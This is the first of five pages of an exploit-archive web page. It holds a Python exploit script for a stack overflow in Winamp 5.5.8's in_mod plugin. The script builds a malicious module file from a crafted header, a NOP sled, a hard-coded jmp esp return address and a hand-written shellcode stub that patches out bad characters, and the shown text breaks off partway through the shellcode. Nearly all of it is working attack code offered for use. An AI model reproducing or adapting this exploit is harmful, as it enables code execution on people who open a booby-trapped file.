Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit

Add date: 10/25/2010 Publishing date: 10/25/2010 Hits: 261

Total 5 pages, Current page:1, Jump to page:

#!/usr/bin/python
# Pwn And Beans by Mighty-D presents:
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow
# WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet
# Bug found by http://www.exploit-db.com/exploits/15248/
# POC by fdisk
# Exploit by Mighty-D
# Special thanks to:
# fdisk: Who wrote the skeleton of what you are looking at
# Ryujin: For pointing the bug
# Muts: For bringing the pain and the omelet ideas that weren't used
# dijital1 and All the EDB-Team
# The guys from UdeA, Ryepes, HerreraDavid, GomezRam7
# Just one comment: Stupid badchars!!!!!!!

header = "\x4D\x54\x4D\x10\x53\x70\x61\x63\x65\x54\x72\x61\x63\x6B\x28\x6B\x6F\x73\x6D\x6F\x73\x69\x73\x29\xE0\x00\x29\x39\x20\xFF\x1F\x00\x40\x0E"
header += "\x04\x0C" * 16

nopsled = "\x90" * 58207

eip = "\xED\x1E\x95\x7C" # jmp esp WIN XP SPANISH change at will

patch_shellcode = "\x90" * 16
patch_shellcode += "\x90\x33\xDB" # Set EBX to zero
patch_shellcode += "\x54\x5B" # PUSH ESP ; POP EBX GET THE RELATIVE POSITION
patch_shellcode += "\x81\xEB\x95\xFC\xFF\xFF" # make EBX point to our shell
patch_shellcode += "\x43"*13 # Move EBX as close as we can to the first badchar
patch_shellcode += "\x90"*4 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*1 # Move EBX to the first badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 13 - verified
patch_shellcode += "\x43"*3 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 05 - verified
patch_shellcode += "\x43"*16 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\xEC" # Set it to 21 - verified
patch_shellcode += "\x43"*1 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x7C" # Set it to 8e - verified
patch_shellcode += "\x90"*8 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*30 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 05 - verified
patch_shellcode += "\x90"*8 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*11 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x42" # Set it to CB - verified
patch_shellcode += "\x43"*1 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x78" # Set it to 92 - verified
patch_shellcode += "\x90"*26 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*18 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 04 - verified
patch_shellcode += "\x90"*16 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*15 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 02 - verified
patch_shellcode += "\x43"*8 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x21" # Set it to EC - verified

Other pages: : 1 * 2 * 3 * 4 * 5 * Next>>

Prev:Hanso Converter 1.1.0 .ogg Denial of Service

Next:HP Data Protector Media Operations 6.11 HTTP Server

Comment:

Category: Home > Exploit